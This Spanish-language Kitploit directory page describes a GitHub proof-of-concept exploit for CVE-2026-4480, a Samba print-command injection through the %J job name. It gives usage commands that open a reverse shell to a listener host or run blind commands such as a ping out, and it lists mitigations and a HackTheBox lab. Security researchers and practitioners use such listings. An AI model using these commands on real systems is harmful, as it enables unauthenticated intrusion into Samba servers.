Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/thecybergeek/cve-2026-4480-poc
ExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

Prueba de concepto de exploit para CVE-2026-4480, una inyección remota de comandos no autenticada en el subsistema de impresión de Samba a través del parámetro %J job name. Incluye modos de shell inversa y ejecución de comandos ciega.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
215hace 2 mesesRevisado por Kitploit

CVE-2026-4480: Inyección en print-command (%J) de Samba - PoC

Importante — Lea esto primero:
Este repositorio y exploit.py se proporcionan solo con fines educativos y de investigación. No use este código contra sistemas, redes o servicios para los cuales no tenga autorización explícita y por escrito. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Al usar este código, acepta cumplir con las leyes aplicables y las políticas institucionales.

Ejecución remota de comandos no autenticada en el subsistema de impresión de Samba. Cuando un trabajo de impresión finaliza su spool, Samba ejecuta el print command configurado a través de system(), sustituyendo %s (ruta del archivo de spool) y %J (nombre del trabajo proporcionado por el cliente) en la cadena. Antes de la corrección, el nombre del trabajo se pasaba con la única transformación ' → _ y nada más, por lo que |, ;, &, espacios, <, > y acentos graves llegan al shell. Un print command que haga referencia a %J es, por lo tanto, un sumidero de inyección de shell, y dado que los invitados pueden enviar trabajos de impresión, el problema es pre-autenticación.

  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • Corregido en: Samba 4.22.10, 4.23.8, 4.24.3
  • Afectados: backends de impresión que ejecutan un print command externo que hace referencia a %J (printing = sysv-style). printing = cups / iprint pasan a través de la API de CUPS y no están afectados.

Requisitos

  • Linux con los enlaces de Python de Samba:
    root@kitploit:~
    sudo apt install python3-samba
    
  • Acceso de red al puerto SMB del objetivo (445/139).
  • Un recurso compartido de impresora accesible para invitados en el objetivo cuyo print command haga referencia a %J.

Uso

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]

Reverse shell

root@kitploit:~
# terminal 1: listener
nc -lvnp 4444

# terminal 2: lanzar el exploit
python3 exploit.py 10.129.244.177 10.10.14.100 4444

Debería obtener una shell como la cuenta del servicio de impresión (ej. nobody).

Ejecutar un solo comando (a ciegas)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

Debido a que la ejecución es a ciegas (el comando se ejecuta en el servidor y no devuelve nada en el canal RPC), confírmelo primero fuera de banda, por ejemplo, con una llamada ICMP que observe con tcpdump -ni tun0 icmp:

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

Detección / mitigación

  • Actualice a 4.22.10 / 4.23.8 / 4.24.3 (o posterior).
  • Si no puede actualizar, cite la macro: print command = /usr/local/bin/print-helper %s '%J', elimine %J, o cámbiese a printing = cups.
  • Busque procesos smbd generando shells (sh/bash/nc/python/curl) y nombres de documentos que contengan metacaracteres de shell.

Practicar en HackTheBox

He creado una máquina en HackTheBox llamada Abducted para mostrar la vulnerabilidad y darle un ejemplo práctico de cómo los atacantes podrían aprovecharla en un entorno mal configurado.

Descargar herramienta
Argumento/opciónSignificado
rhostHost/IP de Samba objetivo
lhostIP de su listener
lportPuerto de su listener
-P, --printerNombre del recurso compartido de impresora invitado (por defecto: HP-Reception)
-c, --cmdEjecutar un comando arbitrario en lugar de una reverse shell